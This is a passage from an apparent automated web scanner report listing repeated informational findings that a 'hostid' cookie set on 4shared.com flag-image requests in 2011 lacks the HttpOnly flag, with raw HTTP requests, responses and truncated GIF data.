GIF89a........FF...6.6V.$y.q.--............Iy....<.<M.M...K.K.......[[.dd...-.-......j.=.RS....==r.G.........%.%.;;......a.2.44...@.@.R.R......+.+...F.FX.X . ...0.0..........B..44;.:....!!A.A.......
...[SNIP]...

6.93. http://www.4shared.com/images/icons/flags/bh.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/icons/flags/bh.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=827177232; Expires=Mon, 26-Jul-2021 13:59:50 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/icons/flags/bh.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:59:50 GMT; Path=/
Set-Cookie: hostid=827177232; Expires=Mon, 26-Jul-2021 13:59:50 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 13:59:50 GMT
ETag: W/"367-1295256544000"
Last-Modified: Mon, 17 Jan 2011 09:29:04 GMT
Content-Type: image/gif
Content-Length: 367
Date: Fri, 29 Jul 2011 13:59:50 GMT

GIF89a........--.AA.RR..........**.;;....... .%%..EE.KK.......ji.>>....66.......KK.GG.......nn.00.fe.......44....WW....22...................\\.BB..........pq....QQ.WW.66....55......................
...[SNIP]...

6.94. http://www.4shared.com/images/icons/flags/bo.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/icons/flags/bo.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=-1070391843; Expires=Mon, 26-Jul-2021 13:59:50 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/icons/flags/bo.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:59:50 GMT; Path=/
Set-Cookie: hostid=-1070391843; Expires=Mon, 26-Jul-2021 13:59:50 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 13:59:50 GMT
ETag: W/"359-1295256544000"
Last-Modified: Mon, 17 Jan 2011 09:29:04 GMT
Content-Type: image/gif
Content-Length: 359
Date: Fri, 29 Jul 2011 13:59:50 GMT

GIF89a.......;.;..|..M.....H.ul..X.}s.......bWi.iC.B&.&..c...............J.J..]..3..i..36.6..k].]..u.....*..a..............C..I..W..R..>..9..MQ.Q....m...:Q......ka..d..p...O.O..z..Q..U.....Y....?U.U.
...[SNIP]...

6.95. http://www.4shared.com/images/icons/flags/br.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/icons/flags/br.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=702271499; Expires=Mon, 26-Jul-2021 13:59:50 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/icons/flags/br.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:59:50 GMT; Path=/
Set-Cookie: hostid=702271499; Expires=Mon, 26-Jul-2021 13:59:50 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 13:59:50 GMT
ETag: W/"367-1295256544000"
Last-Modified: Mon, 17 Jan 2011 09:29:04 GMT
Content-Type: image/gif
Content-Length: 367
Date: Fri, 29 Jul 2011 13:59:50 GMT

GIF89a.............d.d..)b.T.+.ej......TE.E..R{.{S.SCv.h.i..J.X...._._.D.&.&/k...k...;.;9r.5.5..D...6.6v.v...L.L......o.ov.;[.[~..ww....0./.....6..:\..ms.s....B7....19.4..C..s..I.....Q?.@..D...-`...Z.
...[SNIP]...

6.96. http://www.4shared.com/images/icons/flags/ca.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/icons/flags/ca.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=-413967832; Expires=Mon, 26-Jul-2021 13:59:50 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/icons/flags/ca.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:59:50 GMT; Path=/
Set-Cookie: hostid=-413967832; Expires=Mon, 26-Jul-2021 13:59:50 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 13:59:50 GMT
ETag: W/"376-1295256544000"
Last-Modified: Mon, 17 Jan 2011 09:29:04 GMT
Content-Type: image/gif
Content-Length: 376
Date: Fri, 29 Jul 2011 13:59:50 GMT

GIF89a....................zz.il.......<B......................DI.EG.$(.7:.^_....]c.sv..........}........ns.MS.NT.(,.......ef.af.09.UY.lm.XX.KS.....'.jk......................R].+/..........U[.......27.
...[SNIP]...

6.97. http://www.4shared.com/images/icons/flags/fi.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/icons/flags/fi.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=1909348762; Expires=Mon, 26-Jul-2021 13:59:52 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/icons/flags/fi.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:59:52 GMT; Path=/
Set-Cookie: hostid=1909348762; Expires=Mon, 26-Jul-2021 13:59:52 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 13:59:52 GMT
ETag: W/"371-1295256544000"
Last-Modified: Mon, 17 Jan 2011 09:29:04 GMT
Content-Type: image/gif
Content-Length: 371
Date: Fri, 29 Jul 2011 13:59:52 GMT

GIF89a..............+.Ds.......f..Y..;l.......Q}....k..2e....U.................a..Mz.......Nz._........c.....Jx....O|................@o....f......4.Y..7j.............d..............Hw.................
...[SNIP]...

6.98. http://www.4shared.com/images/icons/flags/fr.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/icons/flags/fr.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=-494874545; Expires=Mon, 26-Jul-2021 13:59:52 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/icons/flags/fr.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:59:52 GMT; Path=/
Set-Cookie: hostid=-494874545; Expires=Mon, 26-Jul-2021 13:59:52 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 13:59:52 GMT
ETag: W/"366-1295256544000"
Last-Modified: Mon, 17 Jan 2011 09:29:04 GMT
Content-Type: image/gif
Content-Length: 366
Date: Fri, 29 Jul 2011 13:59:51 GMT

GIF89a.................dV...W{......~..................f...j].............vj.......~r....... .r......WI.pd.......j\..........nb.wk.fZ.]O.RC.M>.......G........^P...Dl.......o...........,W..............
...[SNIP]...

6.99. http://www.4shared.com/images/icons/flags/gb.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/icons/flags/gb.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=1048791324; Expires=Mon, 26-Jul-2021 13:59:52 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/icons/flags/gb.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:59:52 GMT; Path=/
Set-Cookie: hostid=1048791324; Expires=Mon, 26-Jul-2021 13:59:52 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 13:59:52 GMT
ETag: W/"260-1295256544000"
Last-Modified: Mon, 17 Jan 2011 09:29:04 GMT
Content-Type: image/gif
Content-Length: 260
Date: Fri, 29 Jul 2011 13:59:51 GMT

GIF89a........QNPe...m..........45.Ki....+..............`U..|a......cb{.....<R...7q......a...ds.............!.......,...........`.LP.eY...tLL.a.....E....E...|$...A.0..FD....GJ.rIt<.0...x
..r.6......q
...[SNIP]...

6.100. http://www.4shared.com/images/icons/flags/iq.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/icons/flags/iq.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=-1228318283; Expires=Mon, 26-Jul-2021 13:59:52 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/icons/flags/iq.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:59:52 GMT; Path=/
Set-Cookie: hostid=-1228318283; Expires=Mon, 26-Jul-2021 13:59:52 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 13:59:52 GMT
ETag: W/"361-1295256544000"
Last-Modified: Mon, 17 Jan 2011 09:29:04 GMT
Content-Type: image/gif
Content-Length: 361
Date: Fri, 29 Jul 2011 13:59:52 GMT

GIF89a.............,,,.TT....\\FFF.........}{}....ccccd<<<.............LL.kk.EE.{z.88[[[....vvRRS................qr...444...lil........ww.pq............pnp..........jj.//srsxvx....LL.......zz.......
...[SNIP]...

6.101. http://www.4shared.com/images/icons/flags/ir.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/icons/flags/ir.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=-303757224; Expires=Mon, 26-Jul-2021 13:59:54 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/icons/flags/ir.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:59:54 GMT; Path=/
Set-Cookie: hostid=-303757224; Expires=Mon, 26-Jul-2021 13:59:54 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 13:59:54 GMT
ETag: W/"366-1295256544000"
Last-Modified: Mon, 17 Jan 2011 09:29:04 GMT
Content-Type: image/gif
Content-Length: 366
Date: Fri, 29 Jul 2011 13:59:53 GMT

GIF89a..................................J.J.......ef.........b.b....w..33.L.\.\...{.{.d.....DD.[[R.Qk.k<.<r.s....PP.--.DD.%%.;;...........................?.?w.w...S.SW.W...1.0.77.<<...................
...[SNIP]...

6.102. http://www.4shared.com/images/icons/flags/it.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/icons/flags/it.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=-1384037430; Expires=Mon, 26-Jul-2021 13:59:54 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/icons/flags/it.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:59:54 GMT; Path=/
Set-Cookie: hostid=-1384037430; Expires=Mon, 26-Jul-2021 13:59:54 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 13:59:54 GMT
ETag: W/"366-1295256544000"
Last-Modified: Mon, 17 Jan 2011 09:29:04 GMT
Content-Type: image/gif
Content-Length: 366
Date: Fri, 29 Jul 2011 13:59:54 GMT

GIF89a........LL................UU....==......X.Y.W.....\.\...C.BT.U.}.{.{.e.T.T.%%...O.O.v..22..........11I.I....++y.yt.t....o.....66X.X....,,...K.K.77:.:h.h.\\.55.DD`.a............................
...[SNIP]...

6.103. http://www.4shared.com/images/icons/flags/jp.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/icons/flags/jp.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=-757274033; Expires=Mon, 26-Jul-2021 13:59:55 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/icons/flags/jp.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:59:55 GMT; Path=/
Set-Cookie: hostid=-757274033; Expires=Mon, 26-Jul-2021 13:59:55 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 13:59:55 GMT
ETag: W/"366-1295256544000"
Last-Modified: Mon, 17 Jan 2011 09:29:04 GMT
Content-Type: image/gif
Content-Length: 366
Date: Fri, 29 Jul 2011 13:59:54 GMT

GIF89a........;;...................//.66..........**.............FF....55.++.44.UU....<<....KK.HH.$$.......**.AA....}}..........UU.[[.........................yy.~.....................................
...[SNIP]...

6.104. http://www.4shared.com/images/icons/flags/kw.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/icons/flags/kw.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=1900381929; Expires=Mon, 26-Jul-2021 13:59:55 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/icons/flags/kw.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:59:55 GMT; Path=/
Set-Cookie: hostid=1900381929; Expires=Mon, 26-Jul-2021 13:59:55 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 13:59:55 GMT
ETag: W/"362-1295256544000"
Last-Modified: Mon, 17 Jan 2011 09:29:04 GMT
Content-Type: image/gif
Content-Length: 362
Date: Fri, 29 Jul 2011 13:59:54 GMT

GIF89a...........TT...i.i.............++.FF...OOO...L.L.......X.....x.Y\Z4.4B.B...mmm...r.s.44....j.ttu...Z.Y.;;...cgbR.RJIGzzz..E.TTT{.{...{.{a.`.::.]].EE.........\.\.??O.Ow.wy.y...T.T...,.,.......
...[SNIP]...

6.105. http://www.4shared.com/images/icons/flags/lk.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/icons/flags/lk.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=654594557; Expires=Mon, 26-Jul-2021 13:59:56 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/icons/flags/lk.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:59:56 GMT; Path=/
Set-Cookie: hostid=654594557; Expires=Mon, 26-Jul-2021 13:59:56 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 13:59:56 GMT
ETag: W/"377-1295256544000"
Last-Modified: Mon, 17 Jan 2011 09:29:04 GMT
Content-Type: image/gif
Content-Length: 377
Date: Fri, 29 Jul 2011 13:59:55 GMT

GIF89a.........X..K....fP..H..$..G.<Sp.h....Lf\.\..#.5I..P..5..d.e2.Zl..>..C.x$L.H..=.4:..B.yt.E\.o...,..DU.T..3.ct.Rf.YT.....T.-B..e..8.A<..r..[..PD.D..@Q.O..T..gf.e..6.{;....NO..k.PJ.R].....,.....T.
...[SNIP]...

6.106. http://www.4shared.com/images/icons/flags/lt.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/icons/flags/lt.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=1436790188; Expires=Mon, 26-Jul-2021 13:59:57 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/icons/flags/lt.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:59:57 GMT; Path=/
Set-Cookie: hostid=1436790188; Expires=Mon, 26-Jul-2021 13:59:57 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 13:59:57 GMT
ETag: W/"362-1295256544000"
Last-Modified: Mon, 17 Jan 2011 09:29:04 GMT
Content-Type: image/gif
Content-Length: 362
Date: Fri, 29 Jul 2011 13:59:57 GMT

GIF89a.........T..H.....d.**.TTC.C3.3..6.FFU.U.........r.s.J.J<.<.J7........{........E.*...U.ab..;..s..k........U.==.YG.;'..].;;.3..11%.%*.+.{.O.O..dw....h.3.....R?.....M . ....._......44.....^.D1.
...[SNIP]...

6.107. http://www.4shared.com/images/icons/flags/lu.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/icons/flags/lu.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=78160760; Expires=Mon, 26-Jul-2021 13:59:57 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/icons/flags/lu.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:59:57 GMT; Path=/
Set-Cookie: hostid=78160760; Expires=Mon, 26-Jul-2021 13:59:57 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 13:59:57 GMT
ETag: W/"368-1295256544000"
Last-Modified: Mon, 17 Jan 2011 09:29:04 GMT
Content-Type: image/gif
Content-Length: 368
Date: Fri, 29 Jul 2011 13:59:57 GMT

GIF89a.......................(.J...Y........|u..........mfT.........um.......j..D.]........s...d\............z..l..e.....9....|....w.\..b...J..=.........B.....`...7-h............]T...................
...[SNIP]...

6.108. http://www.4shared.com/images/icons/flags/ly.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/icons/flags/ly.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=889952499; Expires=Mon, 26-Jul-2021 13:59:57 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/icons/flags/ly.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:59:57 GMT; Path=/
Set-Cookie: hostid=889952499; Expires=Mon, 26-Jul-2021 13:59:57 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 13:59:57 GMT
ETag: W/"362-1295256544000"
Last-Modified: Mon, 17 Jan 2011 09:29:04 GMT
Content-Type: image/gif
Content-Length: 362
Date: Fri, 29 Jul 2011 13:59:56 GMT

GIF89a..........Y.Y......F.FG.GA.A.t.z.z...e.e.[.K.KP.Pr.rn.n.e.a.aQ.Q%.%M.M0.0:.:a.a.R.U.U....E..L.N.NW.W5.5~.~j.jA.A . =.=7.79.9/./+.+].]*.*.m..{.<.<?.?...^.^v.vI.IS.Sh.hY.YD.CU.U...;.;5.67.7I.IK.K]
...[SNIP]...

6.109. http://www.4shared.com/images/icons/flags/mx.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/icons/flags/mx.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=314688334; Expires=Mon, 26-Jul-2021 13:59:59 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/icons/flags/mx.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:59:59 GMT; Path=/
Set-Cookie: hostid=314688334; Expires=Mon, 26-Jul-2021 13:59:59 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 13:59:59 GMT
ETag: W/"366-1295256544000"
Last-Modified: Mon, 17 Jan 2011 09:29:04 GMT
Content-Type: image/gif
Content-Length: 366
Date: Fri, 29 Jul 2011 13:59:59 GMT

GIF89a........jnU.tz...5;.[.K.l.GK.............1.....DI......d........s...=B./5.X[......`.}.L........)/.........\.z....`............._?..........}j.OS.`d...................JO...<.`.........B.d...h..n
...[SNIP]...

6.110. http://www.4shared.com/images/icons/flags/my.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/icons/flags/my.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=-1262335297; Expires=Mon, 26-Jul-2021 14:00:03 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/icons/flags/my.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:00:03 GMT; Path=/
Set-Cookie: hostid=-1262335297; Expires=Mon, 26-Jul-2021 14:00:03 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:00:03 GMT
ETag: W/"375-1295256544000"
Last-Modified: Mon, 17 Jan 2011 09:29:04 GMT
Content-Type: image/gif
Content-Length: 375
Date: Fri, 29 Jul 2011 14:00:03 GMT

GIF89a....................ST.DD........}.;;.os.$$.33...GG...........LM....EM.......MW.............9C.............,,......LK......%.wK............mm.wu......................;;...............~..........
...[SNIP]...

6.111. http://www.4shared.com/images/icons/flags/nl.gif previous next

Summary

